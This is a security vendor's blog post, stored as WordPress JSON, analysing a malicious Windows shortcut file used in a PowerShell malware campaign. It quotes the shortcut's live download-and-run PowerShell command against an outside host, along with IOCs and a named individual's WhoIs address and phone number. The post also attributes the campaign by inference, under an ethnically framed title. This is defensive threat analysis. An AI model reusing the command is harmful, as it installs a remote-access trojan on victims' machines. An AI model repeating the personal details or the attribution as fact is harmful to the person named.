{"id":2665,"date":"2024-09-25T19:18:24","date_gmt":"2024-09-25T19:18:24","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2665"},"modified":"2025-07-29T06:01:47","modified_gmt":"2025-07-29T06:01:47","slug":"nefarious-nigerians-pedalling-powershell-pwnage","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/nefarious-nigerians-pedalling-powershell-pwnage\/","title":{"rendered":"Nefarious Nigerians Pedalling PowerShell Pwnage"},"content":{"rendered":"
\n
\"100%<\/figure>\n<\/div>\n\n\n

It seems any technology designed to make lives easier for law-abiding citizens can be usurped and corrupted by hackers, and in this, PowerShell is no different. In its legitimate form, PowerShell helps systems administrators automate tasks across both local and remote Windows systems (among many other uses) and is widely considered to be the best choice for performing such tasks.

But PowerShell is also heavily abused by various threat actors for malicious purposes. Our researchers have identified one such campaign which leverages \u201c.lnk\u201d files embedded within PowerShell scripts which download an executable, infecting the target machine for various malicious activities.

A .lnk file is a file extension Windows uses to create shortcuts by pointing to an executable. LNK stands for LiNK. Shortcut files are used as a direct link to an executable file, rather than having to navigate manually to the executable. Over the years, Microsoft has released multiple patches for .lnk vulnerabilities, resolving a number of issues. Among other Powershell version releases, the updated version of Powershell 4.0 has been included in each Microsoft release since 2013.

Of late, the security community has seen many versions of sophisticated PowerShell attack methodologies and tool kits \u2013 widely categorized as \u2018fileless malware\u2019. The sample we\u2019re about to analyse falls under this umbrella. So, without further ado\u2026<\/p>\n\n\n\n

SHA256<\/strong><\/td>1ebb8efa3acd10fac6ffb44d4958ea1ca9d2787b77d209d284bcfba7d9287f16<\/strong><\/td><\/tr>
File Type<\/strong><\/td>Windows Shortcut \u201c.lnk\u201d<\/td><\/tr>
Threat name<\/strong><\/td>Trojan.PowerShell.LNK.Gen.3<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Upon looking into malicious .lnk file\u2019s code, our first observation was that a PowerShell backdoor has been embedded into the shortcut file from the LaunchCommand path. The following artifacts were collected from the .lnk file:<\/p>\n\n\n\n

WorkingDirectory : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe<\/strong> IconLocation : C:\\Windows\\system32\\imageres.dll<\/strong> LaunchString : [System.Diagnostics.Process]::Start(‘(New-objeCt sYsTEM.Net.wEBCLiEnT).dOWnLOadFilE( http:\/\/condorseeds.com\/best.exe , $env:TMp\\best.exe ) ; StARt $eNV:tMP\\best.exe’)<\/strong><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

On visiting the URL highlighted above in the Powershell backdoor, multiple Windows PE files can be observed \u2013 files which are still active on the domain:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The hosted Windows PE file (best.exe) was downloaded for further analysis. According to Virus Total, the executable was identified as \u2018malicious\u2019 by a significant number of anti-virus vendors. Specifically, it was categorized as a \u2018Trojan Agent\u2019. This is a category AV vendors use to identify malware which enables a remote attacker to gain complete access to (or send commands to) a compromised computer:
<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

From the Static Analysis of the sample, the following PE header information was seen, where multiple PE header sections had 0 data bytes: 
<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The PE header time stamp shows a very old compilation date of 1992:

“3d5f6991353499731ab8b5f6c7e57394c86397af6c1ada8a86d4a00cd8825c3d.exe.bin” claims program is from Mon Mar 16 21:26:25 1992

Next, we witnessed the executable make a further code branch decision directly after an environment-aware API. The API, \u2018GetVersion@KERNEL32(.)DLL\u2019, is followed by a Cmp function.

<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

 

The malicious file then made changes on the Windows kernel security device driver which can corrupt or run as a ksecdd.sys process in the victim machine (\\Device\\KsecDD). This can potentially lead to privilege escalation and integrity compromise.

Threat Actor Details: <\/strong>The domain found earlier in the analysis, condorseeds[.]com, was recently registered. A search on WhoIs provided the following information

Name: Michael Ogu (registrant, admin, tech)

Street: 10 Alaeni street Owerri (registrant, admin, tech)

City: Owerri (registrant, admin, tech)

Postal: 100001 (registrant, admin, tech)

Country: NIGERIA (registrant, admin, tech)

Phone: 2348037965994 (registrant, admin, tech)

Further investigation on the registrant\u2019s details and location, seem to link the domain to a Nigerian dealer group based in Owerri known as \u2018OZB COMMUNICATIONS\u2019. Digging through their social media updates, we can see the group\u2019s services include stolen smart phone hack services like root access and IMEI manipulation:  <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Taking these service offerings into account, it doesn\u2019t require a leap of faith to understand the malicious intent behind registering domains to host malware executables \u2013 either the group is selling access to other hackers or are orchestrating attacks themselves. Despite this easily identifiable information, cyber criminals often face no repercussions due to a lack of proper international cooperation in cyber security investigations. 

Indicators of compromise:<\/strong>

Condorseeds[.]com

Malicious Md5 file hash of the campaign<\/strong>

1a3f91d1de16372c6650ccb1d67109d6 (.lnk)

356c42eb560b22d606eeddc834c915aa (.lnk)

c19ed2f057e3e21375e789bdd9ee9467 (Windows EXE)

Conclusion: <\/strong>Most anti-virus vendors update their signature databases and identified these files as malicious. For the love of all that is holy, keep your host AV updated with recent signature details.<\/p>\n","protected":false},"excerpt":{"rendered":"

It seems any technology designed to make lives easier for law-abiding citizens can be usurped and corrupted by hackers, and in this, PowerShell is no different. In its legitimate form, PowerShell helps systems administrators automate tasks across both local and remote Windows systems (among many other uses) and is widely considered to be the best […]<\/p>\n","protected":false},"author":1,"featured_media":2673,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2665","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2665","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2665"}],"version-history":[{"count":5,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2665\/revisions"}],"predecessor-version":[{"id":4302,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2665\/revisions\/4302"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2673"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2665"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2665"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2665"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}